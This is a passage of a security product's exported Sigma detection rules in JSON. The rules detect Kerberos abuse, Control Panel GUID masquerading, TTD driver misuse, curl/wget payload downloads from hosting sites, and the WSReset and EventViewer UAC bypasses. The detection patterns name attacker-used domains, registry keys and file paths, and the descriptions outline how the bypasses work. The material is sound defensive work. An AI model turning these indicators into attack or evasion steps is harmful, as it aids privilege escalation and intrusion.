'?:\\Windows\\System32\\spool\\drivers\\x64\\\\?\\SU2EUP.EXE'\n\n exclusion_eclipse:\n ProcessSigned: 'true'\n ProcessSignature: 'Eclipse.org Foundation, Inc.'\n\n exclusion_rapid7:\n ProcessImage|endswith: '\\nexserv.exe'\n ProcessCommandLine|contains: ' -className=com/rapid7/nexpose/nsc/NSC'\n\n exclusion_smartbrowser:\n ProcessOriginalFileName: 'SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{17696EAC-9568-4CF5-BB8C-82515AAD6C09}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dce8900d-6bdc-42c6-ab73-04731d439106",
"rule_name": "Kerberos Traffic from Unusual Process",
"rule_description": "Detects a network communication to the port 88 (Kerberos protocol) by an unusual process.\nAdversaries may use Kerberos exploitation tools such as Rubeus to communicate with Kerberos' KDC and obtain tickets on behalf of other users.\nIt is recommended to verify the legitimacy of this network connection and check the detected process for any suspicious activity.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd521d1e-6736-4777-9096-97a6d6de66c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071923Z",
"creation_date": "2026-03-23T11:45:34.071925Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071929Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications",
"https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_control_panel_process_exec.yml",
"content": "title: Process Executed from a Folder Masquerading as a Control Panel Item\nid: dd521d1e-6736-4777-9096-97a6d6de66c3\ndescription: |\n Detects a process launched from a folder whose name contains a well-known Control Panel GUID.\n Adversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\n It is recommended to check for malicious activity by the newly created process or its parent processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications\n - https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/10/23\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessImage|contains:\n - '.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}\\'\n - '.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\'\n - '.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\\'\n - '.{087DA31B-0DD3-4537-8E23-64A18591F88B}\\'\n - '.{0D2A3442-5181-4E3A-9BD4-83BD10AF3D76}\\'\n - '.{0DF44EAA-FF21-4412-828E-260A8728E7F1}\\'\n - '.{1206F5F1-0569-412C-8FEC-3204630DFB70}\\'\n - '.{17cd9488-1228-4b2f-88ce-4298e93e0966}\\'\n - '.{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n - '.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\\'\n - '.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}\\'\n - '.{37efd44d-ef8d-41b1-940d-96973a50e9e0}\\'\n - '.{3e7efb4c-faf1-453d-89eb-56026875ef90}\\'\n - '.{4026492F-2F69-46B8-B9BF-5654FC07E423}\\'\n - '.{40419485-C444-4567-851A-2DD7BFA1684D}\\'\n - '.{5224F545-A443-4859-BA23-7B5A95BDC8EF}\\'\n - '.{58E3C745-D971-4081-9034-86E34B30836A}\\'\n - '.{5ea4f148-308c-46d7-98a9-49041b1dd468}\\'\n - '.{60632754-c523-4b62-b45c-4172da012619}\\'\n - '.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\\'\n - '.{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\\'\n - '.{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\\'\n - '.{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\\'\n - '.{725BE8F7-668E-4C7B-8F90-46BDB0936430}\\'\n - '.{74246bfc-4c96-11d0-abef-0020af6b0b7a}\\'\n - '.{78CB147A-98EA-4AA6-B0DF-C8681F69341C}\\'\n - '.{78F3955E-3B90-4184-BD14-5397C15F1EFC}\\'\n - '.{7A979262-40CE-46ff-AEEE-7884AC3B6136}\\'\n - '.{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\\'\n - '.{80F3F1D5-FECA-45F3-BC32-752C152E456E}\\'\n - '.{87D66A43-7B11-4A28-9811-C86EE395ACF7}\\'\n - '.{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\\'\n - '.{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\\'\n - '.{93412589-74D4-4E4E-AD0E-E0CB621440FD}\\'\n - '.{96AE8D84-A250-4520-95A5-A47A7E3C548B}\\'\n - '.{9C60DE1E-E5FC-40f4-A487-460851A8D915}\\'\n - '.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\\'\n - '.{9FE63AFD-59CF-4419-9775-ABCC3849F861}\\'\n - '.{A0275511-0E86-4ECA-97C2-ECD8F1221D08}\\'\n - '.{A304259D-52B8-4526-8B1A-A1D6CECC8243}\\'\n - '.{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\\'\n - '.{A8A91A66-3A7D-4424-8D24-04E180695C7A}\\'\n - '.{AB3BE6AA-7561-4838-AB77-ACF8427DF426}\\'\n - '.{B2C761C6-29BC-4f19-9251-E6195265BAF1}\\'\n - '.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\\'\n - '.{BAA884F4-3432-48b8-AA72-9BF20EEF31D5}\\'\n - '.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\\'\n - '.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\\'\n - '.{BE122A0E-4503-11DA-8BDE-F66BAD1E3F3A}\\'\n - '.{BF782CC9-5A52-4A17-806C-2A894FFEEAC5}\\'\n - '.{C555438B-3C23-4769-A71F-B6D3D9B6053A}\\'\n - '.{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\\'\n - '.{CB1B7F8C-C50A-4176-B604-9E24DEE8D4D1}\\'\n - '.{D20EA4E1-3957-11d2-A40B-0C5020524153}\\'\n - '.{D450A8A1-9568-45C7-9C0E-B4F9FB4537BD}\\'\n - '.{D555645E-D4F8-4c29-A827-D93C859C4F2A}\\'\n - '.{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}\\'\n - '.{D9EF8727-CAC2-4e60-809E-86F80A666C91}\\'\n - '.{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\\'\n - '.{E95A4861-D57A-4be1-AD0F-35267E261739}\\'\n - '.{E9950154-C418-419e-A90A-20C5287AE24B}\\'\n - '.{ECDB0924-4208-451E-8EE0-373C0956DE16}\\'\n - '.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\\'\n - '.{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\\'\n - '.{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\\'\n - '.{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\\'\n - '.{F942C606-0914-47AB-BE56-1321B8035096}\\'\n - '.{FCFEECAE-EE1B-4849-AE50-685DCF7717EC}\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd521d1e-6736-4777-9096-97a6d6de66c3",
"rule_name": "Process Executed from a Folder Masquerading as a Control Panel Item",
"rule_description": "Detects a process launched from a folder whose name contains a well-known Control Panel GUID.\nAdversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\nIt is recommended to check for malicious activity by the newly created process or its parent processes.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611052Z",
"creation_date": "2026-03-23T11:45:34.611056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/",
"https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem",
"https://learn.microsoft.com/en-us/windows-hardware/drivers/debuggercmds/time-travel-debugging-ttd-exe-command-line-util",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_proclaunchmon_load.yml",
"content": "title: TTD ProcLaunchMon Driver Loaded\nid: dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25\ndescription: |\n Detects the loading of the TTD ProcLaunchMon driver.\n ProcLaunchMon driver is a Windows built-in driver and can be used to perform TTD (Time Travel Debugging).\n TTD refers to the ability to track and keep records of the state of a running process over time.\n Adversaries may abuse this tool to disable security products by adding targeted EDR processes to the monitoring session, causing children processes to be suspended.\n This can also be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to ensure that the usage of the ProcLaunchMon is legitimate.\nreferences:\n - https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\n - https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debuggercmds/time-travel-debugging-ttd-exe-command-line-util\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/25\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'ProcLaunchMon.sys'\n - ImageLoaded|endswith: '\\ProcLaunchMon.sys'\n\n selection_signed:\n Signed: 'true'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25",
"rule_name": "TTD ProcLaunchMon Driver Loaded",
"rule_description": "Detects the loading of the TTD ProcLaunchMon driver.\nProcLaunchMon driver is a Windows built-in driver and can be used to perform TTD (Time Travel Debugging).\nTTD refers to the ability to track and keep records of the state of a running process over time.\nAdversaries may abuse this tool to disable security products by adding targeted EDR processes to the monitoring session, causing children processes to be suspended.\nThis can also be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to ensure that the usage of the ProcLaunchMon is legitimate.\n",
"rule_creation_date": "2024-07-25",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd5dc65e-22fb-4e81-88a0-3c0690c1962b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626744Z",
"creation_date": "2026-03-23T11:45:34.626746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_windows.yml",
"content": "title: File Downloaded via Curl or Wget from Suspicious URL (Windows)\nid: dd5dc65e-22fb-4e81-88a0-3c0690c1962b\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/10\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Curl\n - classification.Windows.LOLBin.Wget\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wget.exe'\n - 'curl.exe'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 'paste.c-net.org'\n\n exclusion_paloalto:\n Image: '?:\\Program Files\\Palo Alto Networks\\DEM\\bin\\curl.exe'\n CommandLine|contains: '--resolve www.dropbox.com'\n\n exclusion_sketchup:\n CommandLine: 'curl https://raw.githubusercontent.com/*/config/donate.url -s -o C:/Users/*/AppData/Local/Temp/uir-donate.url'\n ParentImage:\n - '?:\\Program Files\\SketchUp\\\\*\\SketchUp.exe'\n - '?:\\Program Files (x86)\\SketchUp\\\\*\\SketchUp.exe'\n\n exclusion_url:\n CommandLine|contains:\n - 'https://raw.githubusercontent.com/mon5termatt/medicat_installer/'\n - 'https://raw.githubusercontent.com/nvm-sh/nvm/'\n - 'curl -fsSL https://storage.googleapis.com/claude-code-dist-'\n\n exclusion_mingw:\n Image:\n - '?:\\Program Files\\Git\\mingw64\\bin\\curl.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\mingw64\\bin\\curl.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\PortableGit\\mingw64\\bin\\curl.exe'\n ParentImage:\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\PortableGit\\usr\\bin\\bash.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd5dc65e-22fb-4e81-88a0-3c0690c1962b",
"rule_name": "File Downloaded via Curl or Wget from Suspicious URL (Windows)",
"rule_description": "Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2023-02-10",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd6d5465-1550-421c-9598-f5e0a2813c5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077682Z",
"creation_date": "2026-03-23T11:45:34.077684Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077689Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.activecyber.us/activelabs/windows-uac-bypass",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"
],
"name": "t1548_002_prepare_uac_bypass_wsreset_reg.yml",
"content": "title: WSReset UAC Bypass Prepared via Registry\nid: dd6d5465-1550-421c-9598-f5e0a2813c5e\ndescription: |\n Detects attempts to bypass UAC through WSReset.exe by modifying a specific registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This technique exploits WSReset.exe's auto-elevated status to execute arbitrary commands with high integrity without triggering UAC prompts on Windows 10/11 systems.\n It is recommended to investigate the modified registry keys for any unauthorized changes, and validate the legitimacy of high-integrity processes spawned by WSReset.exe.\nreferences:\n - https://www.activecyber.us/activelabs/windows-uac-bypass\n - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\ndate: 2020/09/18\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store\\UserChoice\\ProgId'\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\*'\n\n filter_known_good:\n Details:\n - 'AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2'\n - 'AppXdv25x4ndb8r51pbdf6srsknmbkfnkpaq' # Windows Store Actions\n TargetObject|contains: 'Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store\\UserChoice\\ProgId'\n Image:\n - '?:\\Windows\\System32\\OpenWith.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\mighost.exe'\n\n condition: (selection_set_value and not 1 of filter_*) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd6d5465-1550-421c-9598-f5e0a2813c5e",
"rule_name": "WSReset UAC Bypass Prepared via Registry",
"rule_description": "Detects attempts to bypass UAC through WSReset.exe by modifying a specific registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis technique exploits WSReset.exe's auto-elevated status to execute arbitrary commands with high integrity without triggering UAC prompts on Windows 10/11 systems.\nIt is recommended to investigate the modified registry keys for any unauthorized changes, and validate the legitimacy of high-integrity processes spawned by WSReset.exe.\n",
"rule_creation_date": "2020-09-18",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd8e0768-9335-472a-89fb-71efaa573368",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073918Z",
"creation_date": "2026-03-23T11:45:34.073920Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073925Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/CsEnox/EventViewer-UACBypass/blob/main/Invoke-EventViewer.ps1",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_eventviewr.yml",
"content": "title: UAC Bypass via EventViewer Prepared\nid: dd8e0768-9335-472a-89fb-71efaa573368\ndescription: |\n Detects an unusual process writing to the Event Viewer's RecentViews file.\n This file is automatically loaded and executed when the Event Viewer starts.\n Malicious actors may alter this file's contents to exploit the Event Viewer's automatic privilege elevation feature for UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process editing the file for other potentially harmful activities and to monitor eventvwr.exe for any suspicious behavior.\nreferences:\n - https://github.com/CsEnox/EventViewer-UACBypass/blob/main/Invoke-EventViewer.ps1\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - attack.t1105\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Kind:\n - 'create'\n - 'write'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Event Viewer\\RecentViews'\n - Kind: 'rename'\n TargetPath: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Event Viewer\\RecentViews'\n\n filter_mmc:\n Image:\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\syswow64\\mmc.exe'\n\n filter_svchost:\n Image: '?:\\Windows\\System32\\svchost.exe'\n\n filter_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n Image: '?:\\Windows\\System32\\rundll32.exe'\n ProcessCommandLine|contains: 'shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{????????-????-????-????-????????????}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_explorer:\n Image: '?:\\windows\\Explorer.EXE'\n ProcessParentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_vssvc:\n Image: '?:\\windows\\system32\\vssvc.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_transwiz:\n Image: '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n exclusion_transwiz_signed:\n ProcessDescription: 'ForensiT Transwiz'\n ProcessSigned: 'true'\n ProcessSignature: 'ForensiT Limited'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd8e0768-9335-472a-89fb-71efaa573368",
"rule_name": "UAC Bypass via EventViewer Prepared",
"rule_description": "Detects an unusual process writing to the Event Viewer's RecentViews file.\nThis file is automatically loaded and executed when the Event Viewer starts.\nMalicious actors may alter this file's contents to exploit the Event Viewer's automatic privilege elevation feature for UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process editing the file for other potentially harmful activities and to monitor eventvwr.exe for any suspicious behavior.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-05-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1204.002",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081102Z",
"creation_date": "2026-03-23T11:45:34.081104Z",
